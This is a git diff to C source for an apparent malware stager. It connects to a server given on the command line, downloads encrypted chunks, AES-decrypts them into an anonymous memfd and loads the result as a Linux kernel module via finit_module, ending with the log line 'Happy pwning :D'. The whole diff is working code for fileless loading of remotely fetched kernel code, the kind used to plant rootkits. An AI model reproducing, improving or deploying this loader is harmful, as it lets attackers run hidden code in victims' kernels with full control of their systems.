diff --git a/client/include/fraction.h b/client/include/fraction.h index 1f7aa63..5584336 100644 --- a/client/include/fraction.h +++ b/client/include/fraction.h @@ -25,7 +25,7 @@ typedef struct { uint8_t *data; } fraction_t; -int download_fraction(int sfd, char *url, fraction_t *fraction); +int download_fraction(int sfd, fraction_t *fraction); int fraction_parse(char *data, size_t size, fraction_t *fraction); int check_magic(uint32_t data); void print_fraction(fraction_t fraction); diff --git a/client/include/load.h b/client/include/load.h index ec92b0a..a724f91 100644 --- a/client/include/load.h +++ b/client/include/load.h @@ -6,7 +6,7 @@ #include "../include/cipher.h" #include "../include/log.h" -uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len, unsigned char *key); -int load_lkm(const uint8_t *lkm, ssize_t total_size); +int decrypt_lkm(fraction_t *fractions, int fractions_count, unsigned char *key); +int load_lkm(int fd); #endif diff --git a/client/src/cipher.c b/client/src/cipher.c index 07e4b5c..ecf3366 100644 --- a/client/src/cipher.c +++ b/client/src/cipher.c @@ -37,29 +37,33 @@ int base64_decode(const char *b64_input, unsigned char **output, } ssize_t aes_decrypt(uint8_t *ciphertext, size_t ciphertext_len, uint8_t *key, - uint8_t *iv, uint8_t *plaintext) { + uint8_t *iv, uint8_t *plaintext) { EVP_CIPHER_CTX *ctx; int len; int plaintext_len; if (!(ctx = EVP_CIPHER_CTX_new())) { + EVP_CIPHER_CTX_free(ctx); print_errors(); return -1; } if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) { + EVP_CIPHER_CTX_free(ctx); print_errors(); return -1; } if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len)) { + EVP_CIPHER_CTX_free(ctx); print_errors(); return -1; } plaintext_len = len; if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) { + EVP_CIPHER_CTX_free(ctx); print_errors(); return -1; } diff --git a/client/src/fraction.c b/client/src/fraction.c index 7d40a08..1e6b0a9 100644 --- a/client/src/fraction.c +++ b/client/src/fraction.c @@ -1,21 +1,12 @@ #include "../include/fraction.h" #include "../include/crc32.h" -int download_fraction(int sfd, char *url, fraction_t *fraction) { - char *path = NULL; +int download_fraction(int sfd, fraction_t *fraction) { http_res_t res; fraction_t downloaded_fraction = {}; - // Parse the URL to get the path - path = get_path_from_url(url); - if (!path) { - log_error("Invalid URL: %s", url); - return 1; - } - // Perform the HTTP GET request - if (http_get(sfd, path, &res) != HTTP_SUCCESS) { - log_error("Failed to download: %s", url); + if (http_get(sfd, "/stream", &res) != HTTP_SUCCESS) { return 1; } diff --git a/client/src/load.c b/client/src/load.c index ca0096e..8a43ac7 100644 --- a/client/src/load.c +++ b/client/src/load.c @@ -12,86 +12,76 @@ #include #include -uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len, unsigned char *key) { +int decrypt_lkm(fraction_t *fractions, int fractions_count, + unsigned char *key) { - uint8_t *module = NULL; - ssize_t total_size = 0; - ssize_t module_size = 0; - ssize_t ret; + int fd; + size_t module_size = 0; + ssize_t ret, written; + uint8_t *buf; + char *filename; - for (int i = 0; i < fractions_count; i++) { - total_size += fractions[i].data_size; - } + filename = generate_random_string(); - // total_size at this point is the size of all the cipher text which is - // bigger than the size of the LKM - module = malloc(total_size); + log_debug("Using random filename %s", filename); - if (module == NULL) { - log_error("Could not allocate memory for LKM"); - return NULL; + fd = syscall(SYS_memfd_create, filename, 0); + + free(filename); + + if (fd < 0) { + log_error("memfd_create failed"); + return fd; } for (int i = 0; i < fractions_count; i++) { + // this is always bigger then the plain text size + buf = malloc(fractions[i].data_size); + ret = aes_decrypt(fractions[i].data, fractions[i].data_size, key, - fractions[i].iv, module + module_size); + fractions[i].iv, buf); if (ret < 0) { log_error("Could not decrypt fraction at index %d", i); - free(module); - return NULL; + close(fd); + free(buf); + return -1; } - module_size += ret; - log_debug("Decrypted fraction %d, current module size %ld", i, module_size); - } - log_debug("Decrypted LKM. LKM size = %ld bytes, buffer size = %ld bytes, " - "wasted = %ld bytes", - module_size, total_size, total_size - module_size); - - *len = module_size; - return module; -} - -int load_lkm(const uint8_t *lkm, ssize_t total_size) { - int fdlkm; - ssize_t written_bytes; - char *filename; + written = write(fd, buf, ret); - filename = generate_random_string(); + if (written < 0) { + log_error("Error writing to memfd"); + close(fd); + free(buf); + return -1; + } - log_debug("Using random filename %s", filename); - - fdlkm = syscall(SYS_memfd_create, filename, 0); + if (written != ret) { + log_error("Incomplete write to memfd (Expected %ld, wrote %ld)", + ret, written); + close(fd); + free(buf); + return -1; + } - free(filename); + module_size += ret; + log_debug("Decrypted fraction %d, current module size %ld", i, module_size); - if (fdlkm < 0) { - log_error("memfd_create failed"); - return -1; + free(buf); } - written_bytes = write(fdlkm, lkm, total_size); - if (written_bytes < 0) { - log_error("Error writing to memfd"); - close(fdlkm); - return -1; - } - - if (written_bytes != total_size) { - log_error("Incomplete write to memfd (Expected %zu, wrote %zd)", total_size, - written_bytes); - close(fdlkm); - return -1; - } + log_debug("Decrypted LKM. LKM size = %ld", module_size); + + return fd; +} - if (syscall(SYS_finit_module, fdlkm, "", 0) != 0) { +int load_lkm(int fd) { + if (syscall(SYS_finit_module, fd, "", 0) != 0) { log_error("Failed to init module"); - close(fdlkm); return -1; } log_info("Module loaded successfully. Happy pwning :D"); - close(fdlkm); return 0; } diff --git a/client/src/main.c b/client/src/main.c index 4842d61..0dc5ce8 100644 --- a/client/src/main.c +++ b/client/src/main.c @@ -1,3 +1,5 @@ +#include +#include #include #include #include @@ -10,10 +12,6 @@ #include "../include/sock.h" #include "../include/utils.h" -/* server address */ -#define SERVER_IP "127.0.0.1" -#define SERVER_PORT "8000" - static void cleanup_fraction_array(fraction_t *array, int n_elem) { for (int i = 0; i < n_elem; i++) { fraction_free(&array[i]); @@ -21,18 +19,18 @@ static void cleanup_fraction_array(fraction_t *array, int n_elem) { free(array); } -static int do_connect(void) { +static int do_connect(char *ip_address, char *port) { struct addrinfo hints, *ainfo; int sfd; setup_hints(&hints); - if (h_getaddrinfo(SERVER_IP, SERVER_PORT, &hints, &ainfo) != 0) { + if (h_getaddrinfo(ip_address, port, &hints, &ainfo) != 0) { log_error("Failed to resolve server address"); return -1; } - printf("Connecting to: %s:%s\n", SERVER_IP, SERVER_PORT); + printf("Connecting to: %s:%s\n", ip_address, port); sfd = create_sock_and_conn(ainfo); if (sfd == -1) { log_error("Failed to create socket and connect"); @@ -100,11 +98,8 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { http_res_t http_fraction_res = {0}; fraction_t *fractions = NULL; - char fraction_url[50]; int i, num_fractions; - snprintf(fraction_url, 50, "http://%s:%s/stream", SERVER_IP, SERVER_PORT); - if (http_get(sfd, "/size", &http_fraction_res) != HTTP_SUCCESS) { log_error("Failed to retrieve fraction links"); } @@ -120,12 +115,11 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { http_free(&http_fraction_res); return NULL; } - - i = 0; - while (i < num_fractions) { + + for (i = 0; i < num_fractions; i++) { log_debug("Downloading fraction no.%d", i); - if (download_fraction(sfd, fraction_url, &fractions[i]) != 0) { + if (download_fraction(sfd, &fractions[i]) != 0) { log_error("Failed to download fraction"); // we have to cleanup only until i because the other fractions have not @@ -134,8 +128,6 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { cleanup_fraction_array(fractions, i); return NULL; } - - i++; } http_free(&http_fraction_res); @@ -143,22 +135,69 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { return fractions; } -int main(void) { +static bool validate_ip(const char *ip) { + struct in_addr addr; + + if (inet_pton(AF_INET, ip, &addr) != 1) { + return false; + } + + return true; +} + +static bool validate_port(const char *port) { + long portl; + + errno = 0; + + portl = strtol(port, NULL, 10); + + if (errno != 0) + return false; + if (portl < 0 || portl > USHRT_MAX) + return false; + + return true; +} + +int main(int argc, char **argv) { + + char *ip_address; + char *port; + int sfd = -1; // to be extra professional + int memfd = -1; unsigned char *aes_key = NULL; size_t key_len = 0; - fraction_t *fractions; + fraction_t *fractions = NULL; int fraction_count; - uint8_t *module = NULL; - ssize_t module_size; + if (argc != 3) { + log_error("Usage: %s IP PORT", argv[0]); + goto cleanup; + } + + ip_address = argv[1]; + port = argv[2]; + + // validate IP and port + if (!validate_ip(ip_address)) { + log_error("Invalid IP, format as %%d.%%d.%%d.%%d"); + goto cleanup; + } + + if (!validate_port(port)) { + log_error("Invalid port, should be a number in the range (0-%d)", + USHRT_MAX); + goto cleanup; + } /* We need root permissions to load LKMs */ if (geteuid() != 0) { log_error("This program needs to be run as root!"); - exit(1); + goto cleanup; } /* initialize PRNG and set logging level */ @@ -166,7 +205,7 @@ int main(void) { log_set_level(LOG_DEBUG); /* open a connection to the server */ - sfd = do_connect(); + sfd = do_connect(ip_address, port); if (sfd < 0) { goto cleanup; } @@ -186,35 +225,37 @@ int main(void) { log_info("Downloaded fractions"); /* decrypt the fractions and assemble the LKM */ - module = decrypt_lkm(fractions, fraction_count, &module_size, aes_key); - if (module == NULL) { - log_error("There was an error creating the module"); + + memfd = decrypt_lkm(fractions, fraction_count, aes_key); + if (memfd < 0) { + log_error("There was an error decrypting the module"); cleanup_fraction_array(fractions, fraction_count); goto cleanup; } - /* load the LKM in the kernel */ - if (load_lkm(module, module_size) < 0) { - log_error("Error loading LKM"); + if (load_lkm(memfd) == -1) { + log_error("Failed to load LKM"); goto cleanup; } /* cleanup */ close(sfd); + close(memfd); cleanup_fraction_array(fractions, fraction_count); - free(module); free(aes_key); return EXIT_SUCCESS; // hooray!!! /* Encapsulate cleanup */ cleanup: - if (sfd != -1) close(sfd); - if (fractions) cleanup_fraction_array(fractions, fraction_count); + if (sfd >= 0) + close(sfd); + if (memfd >= 0) + close(memfd); + if (fractions) + cleanup_fraction_array(fractions, fraction_count); - free(module); free(aes_key); return EXIT_FAILURE; - }